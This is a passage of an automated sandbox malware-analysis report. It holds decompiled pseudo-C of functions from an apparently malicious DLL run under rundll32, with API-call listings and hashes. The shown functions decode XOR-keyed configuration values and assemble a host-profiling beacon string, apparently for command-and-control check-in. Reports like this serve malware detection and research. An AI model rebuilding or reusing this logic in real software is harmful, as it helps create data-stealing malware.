                                                  						if(_t19 == 0) {
                                                  							_t23 = 8;
                                                  						} else {
                                                  							 *_a16 = _t19;
                                                  						}
                                                  						__imp__#6(_v12);
                                                  					}
                                                  				}
                                                  				return _t23;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B39152: SysFreeString.OLEAUT32(?), ref: 04B39231
                                                    • Part of subcall function 04B39FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04B37946,004F0053,00000000,?), ref: 04B39FD2
                                                    • Part of subcall function 04B39FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04B37946,004F0053,00000000,?), ref: 04B39FFC
                                                    • Part of subcall function 04B39FC9: memset.NTDLL ref: 04B3A010
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B3937E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 397948122-0
                                                  • Opcode ID: af7dff38e7066a025d398ce0b4d6f0e443d438211d4cd0adc5bab5bdc1c09ec4
                                                  • Instruction ID: 1672483eee587c46a7dc1d037cd5458a257d9bb062cdc02b2deeca28463adf7c
                                                  • Opcode Fuzzy Hash: af7dff38e7066a025d398ce0b4d6f0e443d438211d4cd0adc5bab5bdc1c09ec4
                                                  • Instruction Fuzzy Hash: 10019EB2504019BBDF119FAACC449AEBBB8EB44701F0148A6E911E30A0E3B0B9589791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E04B321CD(void* __ecx, signed char* _a4) {
                                                  				void* _v8;
                                                  				void* _t8;
                                                  				signed short _t11;
                                                  				signed int _t12;
                                                  				signed int _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t19;
                                                  				signed short* _t22;
                                                  				void* _t24;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t24 = 0;
                                                  				_push(0);
                                                  				_t19 = 1;
                                                  				_t27 = 0x4b3d330;
                                                  				E04B384D5();
                                                  				while(1) {
                                                  					_t8 = E04B312D4(_a4,  &_v8); // executed
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_push(_v8);
                                                  					_t14 = 0xd;
                                                  					_t15 = E04B3809F(_t14);
                                                  					if(_t15 == 0) {
                                                  						HeapFree( *0x4b3d238, 0, _v8);
                                                  						break;
                                                  					} else {
                                                  						 *_t27 = _t15;
                                                  						_t27 = _t27 + 4;
                                                  						_t24 = _t24 + 1;
                                                  						if(_t24 < 3) {
                                                  							continue;
                                                  						} else {
                                                  						}
                                                  					}
                                                  					L7:
                                                  					_push(1);
                                                  					E04B384D5();
                                                  					if(_t19 != 0) {
                                                  						_t22 =  *0x4b3d338; // 0x6af9b70
                                                  						_t11 =  *_t22 & 0x0000ffff;
                                                  						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                  							_t12 = _t11 & 0x0000ffff;
                                                  						} else {
                                                  							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                  						}
                                                  						 *_t22 = _t12;
                                                  					}
                                                  					return _t19;
                                                  				}
                                                  				_t19 = 0;
                                                  				goto L7;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B384D5: GetProcAddress.KERNEL32(36776F57,04B321E5), ref: 04B384F0
                                                    • Part of subcall function 04B312D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04B312FF
                                                    • Part of subcall function 04B312D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04B31321
                                                    • Part of subcall function 04B312D4: memset.NTDLL ref: 04B3133B
                                                    • Part of subcall function 04B312D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04B31379
                                                    • Part of subcall function 04B312D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04B3138D
                                                    • Part of subcall function 04B312D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 04B313A4
                                                    • Part of subcall function 04B312D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04B313B0
                                                    • Part of subcall function 04B312D4: lstrcat.KERNEL32(?,642E2A5C), ref: 04B313F1
                                                    • Part of subcall function 04B312D4: FindFirstFileA.KERNELBASE(?,?), ref: 04B31407
                                                    • Part of subcall function 04B3809F: lstrlen.KERNEL32(?,00000000,04B3D330,00000001,04B32200,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9), ref: 04B380A8
                                                    • Part of subcall function 04B3809F: mbstowcs.NTDLL ref: 04B380CF
                                                    • Part of subcall function 04B3809F: memset.NTDLL ref: 04B380E1
                                                  • HeapFree.KERNEL32(00000000,04B3D00C,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9,04B3D00C,?,04B323E9), ref: 04B3221C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 3f5e520bad993f62720ead3074cbd6ed7c3a142ad2fc5866435d64ea953e9aa4
                                                  • Instruction ID: a8b46aa4c0e23a83d0ab38e55124d59cb8e2370b99bf6cba4d40b50e09fd1f8f
                                                  • Opcode Fuzzy Hash: 3f5e520bad993f62720ead3074cbd6ed7c3a142ad2fc5866435d64ea953e9aa4
                                                  • Instruction Fuzzy Hash: 9D01B536200204AAFF04EFEBDC80B6A76A9EB85366F5004F6B944D7050D679BC459661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04B31262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                  				signed short _t18;
                                                  				void* _t24;
                                                  				signed int _t26;
                                                  				signed short _t27;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t18 = E04B39318(_a4, _a8, _a12, __esi); // executed
                                                  					_t27 = _t18;
                                                  				} else {
                                                  					_t27 = E04B36BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                  					if(_t27 == 0) {
                                                  						_t26 = _a8 >> 1;
                                                  						if(_t26 == 0) {
                                                  							_t27 = 2;
                                                  							HeapFree( *0x4b3d238, 0, _a12);
                                                  						} else {
                                                  							_t24 = _a12;
                                                  							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                  							 *__esi = _t24;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t27;
                                                  			}

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04B3743A,?,004F0053,06AF9388,00000000,?), ref: 04B312AD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 4a5e439cfd20b6a76afcbde52fe1ed4b78b2059b1d746503a117e1b563a4c0d8
                                                  • Instruction ID: 1b8699f16bcb3cf14a9737d903b329c1b76fd6772f0c7155b3d89881c0ec8af9
                                                  • Opcode Fuzzy Hash: 4a5e439cfd20b6a76afcbde52fe1ed4b78b2059b1d746503a117e1b563a4c0d8
                                                  • Instruction Fuzzy Hash: 7B011D32100249FBDF22DF9ACC01FAE3BBAEB84362F148469FA159A160D771E521DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E04B32436(intOrPtr* __edi) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _t15;
                                                  				intOrPtr* _t21;
                                                  
                                                  				_t21 = __edi;
                                                  				_push( &_v12);
                                                  				_push(__edi);
                                                  				_v8 = 0x1d4c0;
                                                  				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                  				while(1) {
                                                  					_v16 = _t15;
                                                  					Sleep(0x1f4); // executed
                                                  					if(_v12 == 4) {
                                                  						break;
                                                  					}
                                                  					if(_v8 == 0) {
                                                  						L4:
                                                  						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                  						continue;
                                                  					} else {
                                                  						if(_v8 <= 0x1f4) {
                                                  							_v16 = 0x80004004;
                                                  						} else {
                                                  							_v8 = _v8 - 0x1f4;
                                                  							goto L4;
                                                  						}
                                                  					}
                                                  					L8:
                                                  					return _v16;
                                                  				}
                                                  				goto L8;
                                                  			}

                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 04B3247E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 98cbcaccafeeddcc95818c12f4c4561934fec87014fbed6aec76b0ec3567a611
                                                  • Instruction ID: 25776bb1c5cec8222f9d37989db7c5ccd1747d16f7a04dd675e1deacc3a06194
                                                  • Opcode Fuzzy Hash: 98cbcaccafeeddcc95818c12f4c4561934fec87014fbed6aec76b0ec3567a611
                                                  • Instruction Fuzzy Hash: CEF03C75D01219EFDB04DB99D588AEDB7B8EF04306F1080EAE60267101D3B56B44CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(04B33C81,?,?,04B319A9,3D04B3C0,80000002,04B33C81,04B38B1E,74666F53,4D4C4B48,04B38B1E,?,3D04B3C0,80000002,04B33C81,?), ref: 04B32679
                                                    • Part of subcall function 04B31A03: SysAllocString.OLEAUT32(04B38B1E), ref: 04B31A1D
                                                    • Part of subcall function 04B31A03: SysFreeString.OLEAUT32(00000000), ref: 04B31A5D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreelstrlen
                                                  • String ID:
                                                  • API String ID: 3808004451-0
                                                  • Opcode ID: 861b4a0f8a576caa04bda9a920eb608b696aaf44404f9d0020545fdd6fa3cab3
                                                  • Instruction ID: 6dcfbde3a8469f395514b3abfc458d2dc17045cb8df63c9616e659042b06a7ec
                                                  • Opcode Fuzzy Hash: 861b4a0f8a576caa04bda9a920eb608b696aaf44404f9d0020545fdd6fa3cab3
                                                  • Instruction Fuzzy Hash: 37E0A53600010DBFDF165F91DC46E9A3F6AEF04356F008095BA1414020D732A571EBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 92%
                                                  			E04B34094(int* __ecx) {
                                                  				int _v8;
                                                  				void* _v12;
                                                  				void* __esi;
                                                  				signed int _t20;
                                                  				signed int _t25;
                                                  				char* _t31;
                                                  				char* _t32;
                                                  				char* _t33;
                                                  				char* _t34;
                                                  				char* _t35;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t38;
                                                  				intOrPtr _t39;
                                                  				void* _t41;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t46;
                                                  				intOrPtr _t49;
                                                  				signed int _t50;
                                                  				signed int _t55;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  				signed int _t64;
                                                  				signed int _t68;
                                                  				signed int _t72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				void* _t85;
                                                  				intOrPtr _t102;
                                                  
                                                  				_t86 = __ecx;
                                                  				_t20 =  *0x4b3d278; // 0x63699bc3
                                                  				if(E04B38748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                  					 *0x4b3d2d4 = _v12;
                                                  				}
                                                  				_t25 =  *0x4b3d278; // 0x63699bc3
                                                  				if(E04B38748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                  					_push(2);
                                                  					_pop(0);
                                                  					goto L60;
                                                  				} else {
                                                  					_t85 = _v12;
                                                  					if(_t85 == 0) {
                                                  						_t31 = 0;
                                                  					} else {
                                                  						_t80 =  *0x4b3d278; // 0x63699bc3
                                                  						_t31 = E04B33F7C(_t86, _t85, _t80 ^ 0x724e87bc);
                                                  					}
                                                  					if(_t31 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                  							 *0x4b3d240 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t32 = 0;
                                                  					} else {
                                                  						_t76 =  *0x4b3d278; // 0x63699bc3
                                                  						_t32 = E04B33F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                  					}
                                                  					if(_t32 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                  							 *0x4b3d244 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t33 = 0;
                                                  					} else {
                                                  						_t72 =  *0x4b3d278; // 0x63699bc3
                                                  						_t33 = E04B33F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                  					}
                                                  					if(_t33 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                  							 *0x4b3d248 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t34 = 0;
                                                  					} else {
                                                  						_t68 =  *0x4b3d278; // 0x63699bc3
                                                  						_t34 = E04B33F7C(_t86, _t85, _t68 ^ 0x0602e249);
                                                  					}
                                                  					if(_t34 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                  							 *0x4b3d004 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t35 = 0;
                                                  					} else {
                                                  						_t64 =  *0x4b3d278; // 0x63699bc3
                                                  						_t35 = E04B33F7C(_t86, _t85, _t64 ^ 0x3603764c);
                                                  					}
                                                  					if(_t35 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                  							 *0x4b3d02c = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t36 = 0;
                                                  					} else {
                                                  						_t60 =  *0x4b3d278; // 0x63699bc3
                                                  						_t36 = E04B33F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                  					}
                                                  					if(_t36 != 0) {
                                                  						_push(_t36);
                                                  						_t57 = 0x10;
                                                  						_t58 = E04B36ED2(_t57);
                                                  						if(_t58 != 0) {
                                                  							_push(_t58);
                                                  							E04B3A5D6();
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t37 = 0;
                                                  					} else {
                                                  						_t55 =  *0x4b3d278; // 0x63699bc3
                                                  						_t37 = E04B33F7C(_t86, _t85, _t55 ^ 0xb30fc035);
                                                  					}
                                                  					if(_t37 != 0 && E04B36ED2(0, _t37) != 0) {
                                                  						_t102 =  *0x4b3d32c; // 0x6af95b0
                                                  						E04B375E9(_t102 + 4, _t53);
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t38 = 0;
                                                  					} else {
                                                  						_t50 =  *0x4b3d278; // 0x63699bc3
                                                  						_t38 = E04B33F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                  					}
                                                  					if(_t38 == 0) {
                                                  						L51:
                                                  						_t39 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t18 = _t39 + 0x4b3e252; // 0x616d692f
                                                  						 *0x4b3d2d0 = _t18;
                                                  						goto L52;
                                                  					} else {
                                                  						_t49 = E04B36ED2(0, _t38);
                                                  						 *0x4b3d2d0 = _t49;
                                                  						if(_t49 != 0) {
                                                  							L52:
                                                  							if(_t85 == 0) {
                                                  								_t41 = 0;
                                                  							} else {
                                                  								_t46 =  *0x4b3d278; // 0x63699bc3
                                                  								_t41 = E04B33F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                  							}
                                                  							if(_t41 == 0) {
                                                  								_t42 =  *0x4b3d27c; // 0x1fba5a8
                                                  								_t19 = _t42 + 0x4b3e791; // 0x6976612e
                                                  								_t43 = _t19;
                                                  							} else {
                                                  								_t43 = E04B36ED2(0, _t41);
                                                  							}
                                                  							 *0x4b3d340 = _t43;
                                                  							HeapFree( *0x4b3d238, 0, _t85);
                                                  							L60:
                                                  							return 0;
                                                  						}
                                                  						goto L51;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B34119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B3414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B3417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B341AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B341E1
                                                  • HeapFree.KERNEL32(00000000,04B323DE,04B323DE,?,63699BC3,04B323DE,?,63699BC3,00000005,04B3D00C,00000008,?,04B323DE), ref: 04B342D8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 150e933348dd31a2d66d2bb039a5419fb9f56b844fc239dfddbe835c340e390a
                                                  • Instruction ID: a9e9ca697e62c96b739fd82dc2327786c3c301a05766028da115e1f332a1c906
                                                  • Opcode Fuzzy Hash: 150e933348dd31a2d66d2bb039a5419fb9f56b844fc239dfddbe835c340e390a
                                                  • Instruction Fuzzy Hash: 426186B4710514AEEF20EBBBDC84D5F7BEDDB48743B244996A801E7105E634FD548B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E04B3A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v44;
                                                  				intOrPtr _v52;
                                                  				void* __edi;
                                                  				long _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t33;
                                                  				intOrPtr _t34;
                                                  				int _t37;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t74;
                                                  				int _t77;
                                                  				intOrPtr _t78;
                                                  				int _t81;
                                                  				intOrPtr _t83;
                                                  				int _t86;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr* _t90;
                                                  				void* _t91;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  				intOrPtr _t98;
                                                  				void* _t100;
                                                  				int _t101;
                                                  				void* _t102;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  
                                                  				_t95 = __edx;
                                                  				_t91 = __ecx;
                                                  				_t25 = __eax;
                                                  				_t105 = _a16;
                                                  				_v4 = 8;
                                                  				if(__eax == 0) {
                                                  					_t25 = GetTickCount();
                                                  				}
                                                  				_t26 =  *0x4b3d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t27 =  *0x4b3d014; // 0x3a87c8cd
                                                  				asm("bswap eax");
                                                  				_t28 =  *0x4b3d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t29 =  *0x4b3d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t30 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t3 = _t30 + 0x4b3e633; // 0x74666f73
                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x4b3d02c,  *0x4b3d004, _t25);
                                                  				_t33 = E04B31C1A();
                                                  				_t34 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t4 = _t34 + 0x4b3e673; // 0x74707526
                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                  				_t108 = _t106 + 0x38;
                                                  				_t102 = _t101 + _t37;
                                                  				_t96 = E04B354BC(_t91);
                                                  				if(_t96 != 0) {
                                                  					_t83 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t6 = _t83 + 0x4b3e8eb; // 0x736e6426
                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t86;
                                                  					HeapFree( *0x4b3d238, 0, _t96);
                                                  				}
                                                  				_t97 = E04B37649();
                                                  				if(_t97 != 0) {
                                                  					_t78 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t8 = _t78 + 0x4b3e8f3; // 0x6f687726
                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t81;
                                                  					HeapFree( *0x4b3d238, 0, _t97);
                                                  				}
                                                  				_t98 =  *0x4b3d32c; // 0x6af95b0
                                                  				_a32 = E04B39395(0x4b3d00a, _t98 + 4);
                                                  				_t42 =  *0x4b3d2cc; // 0x0
                                                  				if(_t42 != 0) {
                                                  					_t74 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t11 = _t74 + 0x4b3e8cd; // 0x3d736f26
                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t77;
                                                  				}
                                                  				_t43 =  *0x4b3d2c8; // 0x0
                                                  				if(_t43 != 0) {
                                                  					_t71 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t13 = _t71 + 0x4b3e8c6; // 0x3d706926
                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                  				}
                                                  				if(_a32 != 0) {
                                                  					_t100 = RtlAllocateHeap( *0x4b3d238, 0, 0x800);
                                                  					if(_t100 != 0) {
                                                  						E04B37A80(GetTickCount());
                                                  						_t50 =  *0x4b3d32c; // 0x6af95b0
                                                  						__imp__(_t50 + 0x40);
                                                  						asm("lock xadd [eax], ecx");
                                                  						_t54 =  *0x4b3d32c; // 0x6af95b0
                                                  						__imp__(_t54 + 0x40);
                                                  						_t56 =  *0x4b3d32c; // 0x6af95b0
                                                  						_t103 = E04B38307(1, _t95, _t105,  *_t56);
                                                  						asm("lock xadd [eax], ecx");
                                                  						if(_t103 != 0) {
                                                  							StrTrimA(_t103, 0x4b3c2ac);
                                                  							_push(_t103);
                                                  							_t62 = E04B33CC8();
                                                  							_v16 = _t62;
                                                  							if(_t62 != 0) {
                                                  								_t89 = __imp__;
                                                  								 *_t89(_t103, _v0);
                                                  								 *_t89(_t100, _a4);
                                                  								_t90 = __imp__;
                                                  								 *_t90(_t100, _v28);
                                                  								 *_t90(_t100, _t103);
                                                  								_t68 = E04B31199(0xffffffffffffffff, _t100, _v28, _v24);
                                                  								_v52 = _t68;
                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                  									E04B3A1B0();
                                                  								}
                                                  								HeapFree( *0x4b3d238, 0, _v44);
                                                  							}
                                                  							HeapFree( *0x4b3d238, 0, _t103);
                                                  						}
                                                  						HeapFree( *0x4b3d238, 0, _t100);
                                                  					}
                                                  					HeapFree( *0x4b3d238, 0, _a24);
                                                  				}
                                                  				HeapFree( *0x4b3d238, 0, _t105);
                                                  				return _a12;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04B3A290
                                                  • wsprintfA.USER32 ref: 04B3A2DD
                                                  • wsprintfA.USER32 ref: 04B3A2FA
                                                  • wsprintfA.USER32 ref: 04B3A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3A32D
                                                  • wsprintfA.USER32 ref: 04B3A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3A35F
                                                  • wsprintfA.USER32 ref: 04B3A396
                                                  • wsprintfA.USER32 ref: 04B3A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B3A3D3
                                                  • GetTickCount.KERNEL32 ref: 04B3A3E3
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B3A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B3A415
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?,06AF95B0), ref: 04B38332
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(?,?,?,04B3A428,?,06AF95B0), ref: 04B3833A
                                                    • Part of subcall function 04B38307: strcpy.NTDLL ref: 04B38351
                                                    • Part of subcall function 04B38307: lstrcat.KERNEL32(00000000,?), ref: 04B3835C
                                                    • Part of subcall function 04B38307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B38379
                                                  • StrTrimA.SHLWAPI(00000000,04B3C2AC,?,06AF95B0), ref: 04B3A447
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(06AF87FA,00000000,00000000,74ECC740,04B3A453,00000000), ref: 04B33CD8
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(?), ref: 04B33CE0
                                                    • Part of subcall function 04B33CC8: lstrcpy.KERNEL32(00000000,06AF87FA), ref: 04B33CF4
                                                    • Part of subcall function 04B33CC8: lstrcat.KERNEL32(00000000,?), ref: 04B33CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04B3A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B3A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04B3A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04B3A47E
